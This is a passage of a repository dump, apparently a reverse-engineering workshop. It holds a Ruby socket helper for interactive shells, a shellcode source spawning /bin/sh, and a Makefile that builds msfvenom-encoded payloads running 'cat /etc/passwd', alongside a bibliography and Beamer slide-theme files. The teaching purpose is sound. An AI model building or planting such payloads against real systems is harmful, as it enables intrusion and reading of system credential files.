28 | # doesn't work with ruby 1.8.x or lower 29 | buf = "" 30 | begin 31 | timeout(secs) do 32 | loop { 33 | buf << self.recv(1) 34 | } 35 | end 36 | rescue Timeout::Error 37 | end 38 | buf 39 | end 40 | 41 | def read_til_end timeout 42 | # timeout is time between chars 43 | buf = "" 44 | begin 45 | RollingTimeout.new(timeout) { |timer| 46 | loop { 47 | buf << self.recv(1) 48 | timer.reset 49 | } 50 | } 51 | rescue Timeout::Error 52 | end 53 | buf 54 | end 55 | 56 | def tie! 57 | # kick off a thread just reading forever 58 | Thread.new { loop { $stdout.write(self.recv(4096)) } } 59 | str = "" 60 | loop { 61 | ch = $stdin.read_nonblock(1) rescue nil 62 | if ch == nil 63 | next 64 | end 65 | self.send ch, 0 66 | } 67 | end 68 | end 69 | -------------------------------------------------------------------------------- /pwns/shellcode/binsh.elf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pwns/shellcode/binsh.elf -------------------------------------------------------------------------------- /pwns/shellcode/binsh.r: -------------------------------------------------------------------------------- 1 | execve@syscall(59) 2 | 3 | main@global(32) { 4 | .var0 = "/bin/sh" 5 | execve(.var0, 0, 0); 6 | } 7 | -------------------------------------------------------------------------------- /refs.bib: -------------------------------------------------------------------------------- 1 | @online{r2types, 2 | title = {Radare2 types command}, 3 | url = {http://radare.today/types}, 4 | year = {2014}, 5 | } 6 | @online{r2windbg, 7 | title = {WinDbg in radare2}, 8 | url = {https://github.com/radare/radare2/blob/master/doc/windbg}, 9 | year = {2014}, 10 | } 11 | @online{r2pipe, 12 | title = {R2pipe API}, 13 | url = {https://github.com/radare/radare2/wiki/R2PipeAPI}, 14 | year = {2014}, 15 | } 16 | @misc{uefitool, 17 | author = {Nicolaj Shlej}, 18 | title = {}, 19 | 
year = {2013}, 20 | publisher = {GitHub}, 21 | journal = {GitHub repository}, 22 | howpublished = {\url{https://github.com/LongSoft/UEFITool}}, 23 | } 24 | @misc{openreil, 25 | author = {Dmytro Oleksiuk}, 26 | title = {}, 27 | year = {2015}, 28 | publisher = {GitHub}, 29 | journal = {GitHub repository}, 30 | howpublished = {\url{https://github.com/Cr4sh/openreil}}, 31 | } 32 | @misc{ida-efiutils, 33 | author = {snare}, 34 | title = {}, 35 | year = {2014}, 36 | publisher = {GitHub}, 37 | journal = {GitHub repository}, 38 | howpublished = {\url{https://github.com/snare/ida-efiutils}}, 39 | } 40 | @misc{qemu-omap, 41 | author = {Anton Kochkov}, 42 | title = {QEMU patched for loading OMAP bootroms}, 43 | year = {2013}, 44 | publisher = {GitHub}, 45 | journal = {GitHub repository}, 46 | howpublished = {\url{https://github.com/XVilka/qemu}}, 47 | } 48 | @online{bios-extract, 49 | title = {Bios\_extract}, 50 | url = {http://coreboot.org/Bios_extract}, 51 | year = {2015}, 52 | } 53 | @online{r2esiltv, 54 | title = {ESIL emulation in radare2}, 55 | url = {http://radare.tv/a/44}, 56 | year = {2014}, 57 | } 58 | @online{pwnablekr, 59 | title = {Pwnable kr}, 60 | url = {http://pwnable.kr}, 61 | year = {2015}, 62 | } 63 | -------------------------------------------------------------------------------- /shikata_ga_nai/Makefile: -------------------------------------------------------------------------------- 1 | SRC = slides.tex 2 | PDF = slides.pdf 3 | AUX = slides.aux 4 | TEXC := xelatex 5 | TEXC_OPTS += -shell-escape 6 | 7 | .PHONY: clean install slides 8 | 9 | all: $(PDF) shellcode 10 | 11 | slides: $(PDF) 12 | 13 | shellcode: 14 | /opt/msf/msfvenom -p linux/x86/exec -e x86/shikata_ga_nai -i 12 CMD='cat /etc/passwd' R > shellcode.shikata_ga_nai 15 | /opt/msf/msfvenom -p linux/x86/exec -e x86/call4_dword_xor -i 12 CMD='cat /etc/passwd' R > shellcode.xor 16 | 17 | $(AUX): 18 | $(TEXC) $(TEXC_OPTS) $(SRC) 19 | 20 | $(PDF): beamerthemem.sty $(AUX) $(SRC) 21 | $(TEXC) $(TEXC_OPTS) 
$(SRC) 22 | 23 | clean: 24 | @rm -f $(PDF) 25 | @git clean -xfd 26 | -------------------------------------------------------------------------------- /shikata_ga_nai/beamercolorthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamercolorthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamercolorthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 
18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamercolorthememetropolis}[2015/06/12 Metropolis color theme] 21 | \RequirePackage{pgfopts} 22 | \pgfkeys{ 23 | /metropolis/color/block/.cd, 24 | .is choice, 25 | transparent/.code=\@metropolis@block@transparent, 26 | fill/.code=\@metropolis@block@fill, 27 | } 28 | \pgfkeys{ 29 | /metropolis/color/background/.cd, 30 | .is choice, 31 | dark/.code=\@metropolis@colors@dark, 32 | light/.code=\@metropolis@colors@light, 33 | } 34 | \newcommand{\@metropolis@color@setdefaults}{ 35 | \pgfkeys{/metropolis/color/.cd, 36 | background=light, 37 | block=transparent, 38 | } 39 | } 40 | \definecolor{mDarkBrown}{HTML}{604c38} 41 | \definecolor{mDarkTeal}{HTML}{23373b} 42 | \definecolor{mLightBrown}{HTML}{EB811B} 43 | \definecolor{mLightGreen}{HTML}{14B03D} 44 | \newcommand{\@metropolis@colors@dark}{ 45 | \setbeamercolor{normal text}{% 46 | fg=black!2, 47 | bg=mDarkTeal 48 | } 49 | } 50 | \newcommand{\@metropolis@colors@light}{ 51 | \setbeamercolor{normal text}{% 52 | fg=mDarkTeal, 53 | bg=black!2 54 | } 55 | } 56 | \setbeamercolor{alerted text}{% 57 | fg=mLightBrown 58 | } 59 | \setbeamercolor{example text}{% 60 | fg=mLightGreen 61 | } 62 | \setbeamercolor{titlelike}{use=normal text, parent=normal text} 63 | \setbeamercolor{author}{use=normal text, parent=normal text} 64 | \setbeamercolor{date}{use=normal text, parent=normal text} 65 | \setbeamercolor{institute}{use=normal text, parent=normal text} 66 | \setbeamercolor{structure}{use=normal text, fg=normal text.fg} 67 | \setbeamercolor{palette primary}{% 68 | use=normal text, 69 | fg=normal text.bg, 70 | bg=normal text.fg 71 | } 72 | \setbeamercolor{frametitle}{% 73 | use=palette primary, 74 | parent=palette primary 75 | } 76 | \setbeamercolor{progress bar}{% 77 | use=alerted text, 78 | fg=alerted text.fg, 79 | bg=normal text.bg!50!normal text.fg 80 | } 81 | \setbeamercolor{title separator}{ 82 | 
use=progress bar, 83 | parent=progress bar 84 | } 85 | \setbeamercolor{progress bar in head/foot}{% 86 | use=progress bar, 87 | parent=progress bar 88 | } 89 | \setbeamercolor{progress bar in section page}{ 90 | use=progress bar, 91 | parent=progress bar 92 | } 93 | \newcommand{\@metropolis@block@transparent}{ 94 | \setbeamercolor{block title}{use=normal text, parent=normal text} 95 | } 96 | \newcommand{\@metropolis@block@fill}{ 97 | \setbeamercolor{block title}{% 98 | use=normal text, 99 | fg=normal text.fg, 100 | bg=normal text.bg!80!fg 101 | } 102 | } 103 | \setbeamercolor{block title alerted}{% 104 | use={block title, alerted text}, 105 | bg=block title.bg, 106 | fg=alerted text.fg 107 | } 108 | \setbeamercolor{block title example}{% 109 | use={block title, example text}, 110 | bg=block title.bg, 111 | fg=example text.fg 112 | } 113 | \setbeamercolor{block body alerted}{use=block body, parent=block body} 114 | \setbeamercolor{block body example}{use=block body, parent=block body} 115 | \setbeamercolor{block body}{ 116 | use={block title, normal text}, 117 | bg=block title.bg!50!normal text.bg 118 | } 119 | \setbeamercolor{footnote}{fg=normal text.fg!90} 120 | \setbeamercolor{footnote mark}{fg=.} 121 | \@metropolis@color@setdefaults 122 | \ProcessPgfPackageOptions{/metropolis/color} 123 | \mode 124 | \endinput 125 | %% 126 | %% End of file `beamercolorthememetropolis.sty'. 127 | -------------------------------------------------------------------------------- /shikata_ga_nai/beamerfontthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerfontthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerfontthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. 
A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerfontthememetropolis}[2015/06/12 Metropolis font theme] 21 | \RequirePackage[no-math]{fontspec} 22 | \defaultfontfeatures{Mapping=tex-text} 23 | \setsansfont[BoldItalicFont={Fira Sans Italic},% 24 | ItalicFont={Fira Sans Light Italic},% 25 | BoldFont={Fira Sans}]{Fira Sans Light} 26 | \setmonofont{Fira Mono} 27 | \newfontfamily\ExtraLight{Fira Sans ExtraLight} 28 | \newfontfamily\Light{Fira Sans Light} 29 | \newfontfamily\Book{Fira Sans} 30 | \newfontfamily\Medium{Fira Sans Medium} 31 | \AtBeginEnvironment{tabular}{% 32 | \setsansfont[BoldFont={Fira Sans},% 33 | Numbers={Monospaced}]{Fira Sans Light}% 34 | } 35 | \setbeamerfont{title}{family=\Book, size=\Large, shape=\scshape} 36 | \setbeamerfont{author}{family=\ExtraLight, size=\small} 37 | \setbeamerfont{date}{family=\ExtraLight, size=\small} 38 | \setbeamerfont{section title}{family=\Book, size=\Large, shape=\scshape} 39 | \setbeamerfont{block title}{family=\Book, size=\normalsize} 40 | \setbeamerfont{block title alerted}{family=\Book,size=\normalsize} 41 | \setbeamerfont{subtitle}{family=\Light, size=\fontsize{12}{14}} 42 | \setbeamerfont{frametitle}{family=\Book, size=\large, shape=\scshape} 43 | \setbeamerfont{caption}{size=\small} 44 | \setbeamerfont{caption name}{family=\Book} 45 | \setbeamerfont{description item}{family=\Book} 46 | \setbeamerfont{page number in head/foot}{size=\scriptsize} 47 | \setbeamerfont{bibliography entry author}{family=\Light, size=\normalsize} 48 | 
\setbeamerfont{bibliography entry title}{family=\Book, size=\normalsize} 49 | \setbeamerfont{bibliography entry location}{family=\Light, size=\normalsize} 50 | \setbeamerfont{bibliography entry note}{family=\Light, size=\small} 51 | \linespread{1.15} 52 | 53 | \endinput 54 | %% 55 | %% End of file `beamerfontthememetropolis.sty'. 56 | -------------------------------------------------------------------------------- /shikata_ga_nai/beamerinnerthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerinnerthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerinnerthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 
18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerinnerthememetropolis}[2015/06/12 Metropolis inner theme] 21 | \RequirePackage{etoolbox} 22 | \RequirePackage{calc} 23 | \RequirePackage{pgfopts} 24 | \RequirePackage{tikz} 25 | \pgfkeys{ 26 | /metropolis/inner/block/.cd, 27 | .is choice, 28 | transparent/.code=\setlength{\@metropolis@blockskip}{0ex}, 29 | fill/.code=\setlength{\@metropolis@blockskip}{1ex}, 30 | } 31 | \pgfkeys{ 32 | /metropolis/inner/titleformat/.cd, 33 | .is choice, 34 | regular/.code=\renewcommand{\@metropolis@titleformat}{}, 35 | lowercase/.code={% 36 | \renewcommand{\@metropolis@titleformat}{\MakeLowercase} 37 | }, 38 | uppercase/.code={% 39 | \renewcommand{\@metropolis@titleformat}{\MakeUppercase} 40 | }, 41 | } 42 | \pgfkeys{ 43 | /metropolis/inner/sectiontitleformat/.cd, 44 | .is choice, 45 | regular/.code=\renewcommand{\@metropolis@sectiontitleformat}{}, 46 | lowercase/.code={% 47 | \renewcommand{\@metropolis@sectiontitleformat}{\MakeLowercase} 48 | }, 49 | uppercase/.code={% 50 | \renewcommand{\@metropolis@sectiontitleformat}{\MakeUppercase} 51 | }, 52 | } 53 | \pgfkeys{ 54 | /metropolis/inner/sectionpage/.cd, 55 | .is choice, 56 | none/.code=\@metropolis@sectionpage@none, 57 | progressbar/.code=\@metropolis@sectionpage@progressbar, 58 | } 59 | \newcommand{\@metropolis@inner@setdefaults}{ 60 | \pgfkeys{/metropolis/inner/.cd, 61 | sectionpage=progressbar, 62 | block=transparent, 63 | titleformat=lowercase, 64 | sectiontitleformat=lowercase, 65 | } 66 | } 67 | \def\@metropolis@titleformat#1{#1} 68 | \def\@metropolis@sectiontitleformat#1{#1} 69 | \patchcmd{\sectionentry} 70 | {\def\insertsectionhead{#2}} 71 | {\def\insertsectionhead{\@metropolis@sectiontitleformat{#2}}} 72 | {} 73 | {\PackageError{beamerinnerthememetropolis}{Patching section title failed.}} 74 | \patchcmd{\beamer@section} 75 | 
{\def\insertsectionhead{\hyperlink{Navigation\the\c@page}{#1}}} 76 | {\def\insertsectionhead{\hyperlink{Navigation\the\c@page}{\@metropolis@sectiontitleformat{#1}}}} 77 | {} 78 | {\PackageError{beamerinnerthememetropolis}{Patching section title failed.}} 79 | \setbeamertemplate{title page}{ 80 | \begin{minipage}[b][\paperheight]{\textwidth} 81 | \ifx\inserttitlegraphic\@empty\else\usebeamertemplate*{title graphic}\fi 82 | \vfill% 83 | \ifx\inserttitle\@empty\else\usebeamertemplate*{title}\fi 84 | \ifx\insertsubtitle\@empty\else\usebeamertemplate*{subtitle}\fi 85 | \usebeamertemplate*{title separator} 86 | \ifx\beamer@shortauthor\@empty\else\usebeamertemplate*{author}\fi 87 | \ifx\insertdate\@empty\else\usebeamertemplate*{date}\fi 88 | \ifx\insertinstitute\@empty\else\usebeamertemplate*{institute}\fi 89 | \vfill 90 | \vspace*{1mm} 91 | \end{minipage} 92 | } 93 | \def\maketitle{% 94 | \ifbeamer@inframe 95 | \titlepage 96 | \else 97 | \frame[plain]{\titlepage} 98 | \fi 99 | } 100 | \def\titlepage{% 101 | \usebeamertemplate{title page} 102 | } 103 | \setbeamertemplate{title graphic}{ 104 | \vbox to 0pt { 105 | \vspace*{2em} 106 | \inserttitlegraphic% 107 | }% 108 | \nointerlineskip% 109 | } 110 | \setbeamertemplate{title}{ 111 | \raggedright% 112 | \linespread{1.0}% 113 | \@metropolis@titleformat{\inserttitle}% 114 | \par% 115 | \vspace*{0.5em} 116 | } 117 | \setbeamertemplate{subtitle}{ 118 | \insertsubtitle% 119 | \par% 120 | \vspace*{0.5em} 121 | } 122 | \setbeamertemplate{title separator}{ 123 | \begin{tikzpicture} 124 | \draw[fg] (0, 0) -- (\textwidth, 0); 125 | \end{tikzpicture}% 126 | \par% 127 | } 128 | \setbeamertemplate{author}{ 129 | \vspace*{2em} 130 | \insertauthor% 131 | \par% 132 | \vspace*{0.25em} 133 | } 134 | \setbeamertemplate{date}{ 135 | \insertdate% 136 | \par% 137 | } 138 | \setbeamertemplate{institute}{ 139 | \vspace*{3mm} 140 | \insertinstitute% 141 | \par% 142 | } 143 | \newcommand{\@metropolis@sectionpage@none}{ 144 | \AtBeginSection{ 145 | % 
intenionally empty 146 | } 147 | } 148 | \defbeamertemplate{section page}{progressbar}{ 149 | \centering 150 | \begin{minipage}{22em} 151 | \usebeamercolor[fg]{section title} 152 | \usebeamerfont{section title} 153 | \insertsectionhead\\[-1ex] 154 | \usebeamertemplate*{progress bar in section page} 155 | \end{minipage} 156 | \par 157 | } 158 | \newcommand{\@metropolis@sectionpage@progressbar}{ 159 | \setbeamertemplate{section page}[progressbar] 160 | \AtBeginSection{ 161 | \ifbeamer@inframe 162 | \sectionpage 163 | \else 164 | \frame[plain,c]{\sectionpage} 165 | \fi 166 | } 167 | } 168 | \newlength{\metropolis@progressonsectionpage} 169 | \setbeamertemplate{progress bar in section page}{ 170 | \setlength{\metropolis@progressonsectionpage}{% 171 | \textwidth * \ratio{\insertframenumber pt}{\inserttotalframenumber pt}% 172 | }% 173 | \begin{tikzpicture} 174 | \draw[bg, fill=bg] (0,0) rectangle (\textwidth, 0.4pt); 175 | \draw[fg, fill=fg] (0,0) rectangle (\metropolis@progressonsectionpage, 0.4pt); 176 | \end{tikzpicture}% 177 | } 178 | \def\inserttotalframenumber{100} 179 | \newlength{\@metropolis@blockskip} 180 | \setbeamertemplate{block begin}{% 181 | \vspace*{1ex} 182 | \begin{beamercolorbox}[% 183 | ht=2.4ex, 184 | dp=1ex, 185 | leftskip=\@metropolis@blockskip, 186 | rightskip=\@metropolis@blockskip]{block title} 187 | \usebeamerfont*{block title}\insertblocktitle% 188 | \end{beamercolorbox}% 189 | \vspace*{-1pt} 190 | \usebeamerfont{block body}% 191 | \begin{beamercolorbox}[% 192 | dp=1ex, 193 | leftskip=\@metropolis@blockskip, 194 | rightskip=\@metropolis@blockskip, 195 | vmode]{block body}% 196 | } 197 | \setbeamertemplate{block end}{% 198 | \end{beamercolorbox} 199 | \vspace*{0.2ex} 200 | } 201 | \setbeamertemplate{block alerted begin}{% 202 | \vspace*{1ex} 203 | \begin{beamercolorbox}[% 204 | ht=2.4ex, 205 | dp=1ex, 206 | leftskip=\@metropolis@blockskip, 207 | rightskip=\@metropolis@blockskip]{block title alerted} 208 | \usebeamerfont*{block title 
alerted}\insertblocktitle% 209 | \end{beamercolorbox}% 210 | \vspace*{-1pt} 211 | \usebeamerfont{block body alerted}% 212 | \begin{beamercolorbox}[% 213 | dp=1ex, 214 | leftskip=\@metropolis@blockskip, 215 | rightskip=\@metropolis@blockskip, 216 | vmode]{block body}% 217 | } 218 | \setbeamertemplate{block alerted end}{% 219 | \end{beamercolorbox} 220 | \vspace*{0.2ex} 221 | } 222 | \setbeamertemplate{block example begin}{% 223 | \vspace*{1ex} 224 | \begin{beamercolorbox}[% 225 | ht=2.4ex, 226 | dp=1ex, 227 | leftskip=\@metropolis@blockskip, 228 | rightskip=\@metropolis@blockskip]{block title example} 229 | \usebeamerfont*{block title example}\insertblocktitle% 230 | \end{beamercolorbox}% 231 | \vspace*{-1pt} 232 | \usebeamerfont{block body example}% 233 | \begin{beamercolorbox}[% 234 | dp=1ex, 235 | leftskip=\@metropolis@blockskip, 236 | rightskip=\@metropolis@blockskip, 237 | vmode]{block body}% 238 | } 239 | \setbeamertemplate{block example end}{% 240 | \end{beamercolorbox} 241 | \vspace*{0.2ex} 242 | } 243 | \setbeamertemplate{itemize items}{\textbullet} 244 | \setbeamertemplate{caption label separator}{: } 245 | \setbeamertemplate{caption}[numbered] 246 | \setbeamertemplate{footnote}{% 247 | \parindent 0em\noindent% 248 | \raggedright 249 | \usebeamercolor{footnote}\hbox to 0.8em{\hfil\insertfootnotemark}\insertfootnotetext\par% 250 | } 251 | \setlength{\parskip}{0.5em} 252 | \linespread{1.15} 253 | \define@key{beamerframe}{c}[true]{% centered 254 | \beamer@frametopskip=0pt plus 1fill\relax% 255 | \beamer@framebottomskip=0pt plus 1fill\relax% 256 | \beamer@frametopskipautobreak=0pt plus .4\paperheight\relax% 257 | \beamer@framebottomskipautobreak=0pt plus .6\paperheight\relax% 258 | \def\beamer@initfirstlineunskip{}% 259 | } 260 | \@metropolis@inner@setdefaults 261 | \ProcessPgfPackageOptions{/metropolis/inner} 262 | \endinput 263 | %% 264 | %% End of file `beamerinnerthememetropolis.sty'. 
265 | -------------------------------------------------------------------------------- /shikata_ga_nai/beamerouterthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerouterthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerouterthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerouterthememetropolis}[2015/06/12 Metropolis outer theme] 21 | \RequirePackage{etoolbox} 22 | \RequirePackage{calc} 23 | \RequirePackage{pgfopts} 24 | \pgfkeys{ 25 | /metropolis/outer/numbering/.cd, 26 | .is choice, 27 | none/.code=\setbeamertemplate{frame numbering}[none], 28 | counter/.code=\setbeamertemplate{frame numbering}[counter], 29 | fraction/.code=\setbeamertemplate{frame numbering}[fraction], 30 | } 31 | \pgfkeys{ 32 | /metropolis/outer/progressbar/.cd, 33 | .is choice, 34 | none/.code={% 35 | \setbeamertemplate{headline}[plain] 36 | \setbeamertemplate{frametitle}[plain] 37 | \setbeamertemplate{footline}[plain] 38 | }, 39 | head/.code={\pgfkeys{/metropolis/outer/progressbar=none} 40 | \addtobeamertemplate{headline}{}{\usebeamertemplate*{progress bar in head/foot}} 41 | }, 42 | frametitle/.code={\pgfkeys{/metropolis/outer/progressbar=none} 43 | 
\addtobeamertemplate{frametitle}{}{\usebeamertemplate*{progress bar in head/foot}} 44 | }, 45 | foot/.code={\pgfkeys{/metropolis/outer/progressbar=none} 46 | \addtobeamertemplate{footline}{}{\usebeamertemplate*{progress bar in head/foot}} 47 | }, 48 | } 49 | \pgfkeys{ 50 | /metropolis/outer/frametitleformat/.cd, 51 | .is choice, 52 | regular/.code={% 53 | \renewcommand{\@metropolis@frametitleformat}{}% 54 | \renewcommand{\@metropolis@frametitlestrut}{% 55 | \rule{0pt}{\heightof{ABCDEFGHIJKLMNOPQRSTUVWXYZ}} 56 | } 57 | }, 58 | lowercase/.code={% 59 | \renewcommand{\@metropolis@frametitleformat}{\MakeLowercase}% 60 | \renewcommand{\@metropolis@frametitlestrut}{% 61 | \rule{0pt}{\heightof{abcdefghijklmnopqrstuvwxyz}} 62 | } 63 | }, 64 | uppercase/.code={% 65 | \renewcommand{\@metropolis@frametitleformat}{\MakeUppercase}% 66 | \renewcommand{\@metropolis@frametitlestrut}{% 67 | \rule{0pt}{\heightof{ABCDEFGHIJKLMNOPQRSTUVWXYZ}} 68 | } 69 | }, 70 | } 71 | \newcommand{\@metropolis@outer@setdefaults}{ 72 | \pgfkeys{/metropolis/outer/.cd, 73 | numbering=counter, 74 | progressbar=none, 75 | frametitleformat=lowercase, 76 | } 77 | } 78 | \setbeamertemplate{navigation symbols}{} 79 | \defbeamertemplate{frame numbering}{none}{} 80 | \defbeamertemplate{frame numbering}{counter}{\insertframenumber} 81 | \defbeamertemplate{frame numbering}{fraction}{ 82 | \insertframenumber/\inserttotalframenumber 83 | } 84 | \defbeamertemplate{headline}{plain}{} 85 | \defbeamertemplate{footline}{plain}{% 86 | \begin{beamercolorbox}[wd=\textwidth, sep=3ex]{footline}% 87 | \hfill% 88 | \usebeamerfont{page number in head/foot}% 89 | \usebeamertemplate*{frame numbering} 90 | \end{beamercolorbox}% 91 | } 92 | \def\@metropolis@frametitleformat#1{#1} 93 | \patchcmd{\beamer@@frametitle} 94 | {\beamer@ifempty{#2}{}{% 95 | \gdef\insertframetitle{{#2\ifnum\beamer@autobreakcount>0\relax{}\space\usebeamertemplate*{frametitle continuation}\fi}}% 96 | \gdef\beamer@frametitle{#2}% 97 | 
\gdef\beamer@shortframetitle{#1}% 98 | }} 99 | {\beamer@ifempty{#2}{}{% 100 | \gdef\insertframetitle{{\@metropolis@frametitleformat{#2}\ifnum\beamer@autobreakcount>0\relax{}\space\usebeamertemplate*{frametitle continuation}\fi}}% 101 | \gdef\beamer@frametitle{#2}% 102 | \gdef\beamer@shortframetitle{#1}% 103 | }} 104 | {} 105 | {\PackageError{beamerouterthememetropolis}{Patching frame title failed.}} 106 | \newlength{\@metropolis@frametitlestrut} 107 | \defbeamertemplate{frametitle}{plain}{% 108 | \nointerlineskip% 109 | \begin{beamercolorbox}[% 110 | wd=\paperwidth,% 111 | sep=1.5ex,% 112 | ]{frametitle}% 113 | \@metropolis@frametitlestrut\insertframetitle\@metropolis@frametitlestrut% 114 | \end{beamercolorbox}% 115 | } 116 | \newlength{\metropolis@progressinheadfoot} 117 | \setbeamertemplate{progress bar in head/foot}{ 118 | \nointerlineskip 119 | \setlength{\metropolis@progressinheadfoot}{% 120 | \paperwidth * \ratio{\insertframenumber pt}{\inserttotalframenumber pt}% 121 | }% 122 | \begin{beamercolorbox}[wd=\paperwidth]{progress bar in head/foot} 123 | \begin{tikzpicture} 124 | \draw[bg, fill=bg] (0,0) rectangle (\paperwidth, 0.4pt); 125 | \draw[fg, fill=fg] (0,0) rectangle (\metropolis@progressinheadfoot, 0.4pt); 126 | \end{tikzpicture}% 127 | \end{beamercolorbox} 128 | } 129 | \@metropolis@outer@setdefaults 130 | \ProcessPgfPackageOptions{/metropolis/outer} 131 | \endinput 132 | %% 133 | %% End of file `beamerouterthememetropolis.sty'. 134 | -------------------------------------------------------------------------------- /shikata_ga_nai/beamerthemem.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerthemem.sty', 3 | %% generated with the docstrip utility. 
4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerthemem.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerthemem}[2015/06/12 Metropolis Beamer theme] 21 | \RequirePackage{etoolbox} 22 | \RequirePackage{pgfopts} 23 | \RequirePackage{ifxetex} 24 | \RequirePackage{ifluatex} 25 | \newcommand{\metroset}[1]{\pgfkeys{/metropolis/.cd,#1}} 26 | \pgfkeys{/metropolis/.cd, 27 | .search also={ 28 | /metropolis/inner, 29 | /metropolis/outer, 30 | /metropolis/color, 31 | }, 32 | block/.code=\pgfkeysalso{ 33 | inner/block=#1, 34 | color/block=#1, 35 | }, 36 | } 37 | \pgfkeys{ 38 | /metropolis/plaintitleformat/.cd, 39 | .is choice, 40 | regular/.code=\renewcommand{\@metropolis@plaintitleformat}{#1}, 41 | lowercase/.code={% 42 | \renewcommand{\@metropolis@plaintitleformat}{\MakeLowercase{#1}} 43 | }, 44 | uppercase/.code={% 45 | \renewcommand{\@metropolis@plaintitleformat}{\MakeUppercase{#1}} 46 | }, 47 | } 48 | \pgfkeys{ 49 | /metropolis/everytitleformat/.code=\pgfkeysalso{ 50 | inner/titleformat=#1, 51 | inner/sectiontitleformat=#1, 52 | outer/frametitleformat=#1, 53 | plaintitleformat=#1, 54 | } 55 | } 56 | \pgfkeys{/metropolis/.cd, 57 | usetitleprogressbar/.code=\pgfkeysalso{outer/progressbar=frametitle}, 58 | noslidenumbers/.code=\pgfkeysalso{outer/numbering=none}, 59 | 
usetotalslideindicator/.code=\pgfkeysalso{outer/numbering=fraction}, 60 | nosectionslide/.code=\pgfkeysalso{inner/sectionpage=none}, 61 | darkcolors/.code=\pgfkeysalso{color/background=dark}, 62 | blockbg/.code=\pgfkeysalso{color/block=fill, inner/block=fill}, 63 | } 64 | \newcommand{\@metropolis@setdefaults}{ 65 | \pgfkeys{/metropolis/.cd, 66 | plaintitleformat=lowercase, 67 | } 68 | } 69 | \useinnertheme{metropolis} 70 | \useoutertheme{metropolis} 71 | \usecolortheme{metropolis} 72 | \ifboolexpr{bool {xetex} or bool {luatex}}{ 73 | \usefonttheme{metropolis} 74 | }{ 75 | \PackageWarning{beamerthemem}{% 76 | You need to compile with XeLaTeX or LuaLaTeX to use the Fira fonts. 77 | } 78 | } 79 | \AtEndPreamble{% 80 | \@ifpackageloaded{pgfplots}{% 81 | \RequirePackage{pgfplotsthemetol} 82 | }{} 83 | } 84 | \def\@metropolis@plaintitleformat#1{#1} 85 | \newcommand{\plain}[2][]{% 86 | \begingroup 87 | \setbeamercolor{background canvas}{ 88 | use=palette primary, 89 | parent=palette primary 90 | } 91 | \begin{frame}[c]{#1} 92 | \begin{center} 93 | \usebeamercolor[fg]{palette primary} 94 | \usebeamerfont{section title} 95 | \@metropolis@plaintitleformat{#2} 96 | \end{center} 97 | \end{frame} 98 | \endgroup 99 | } 100 | \newcommand{\mreducelistspacing}{\vspace{-\topsep}} 101 | \@metropolis@setdefaults 102 | \ProcessPgfOptions{/metropolis} 103 | \endinput 104 | %% 105 | %% End of file `beamerthemem.sty'. 
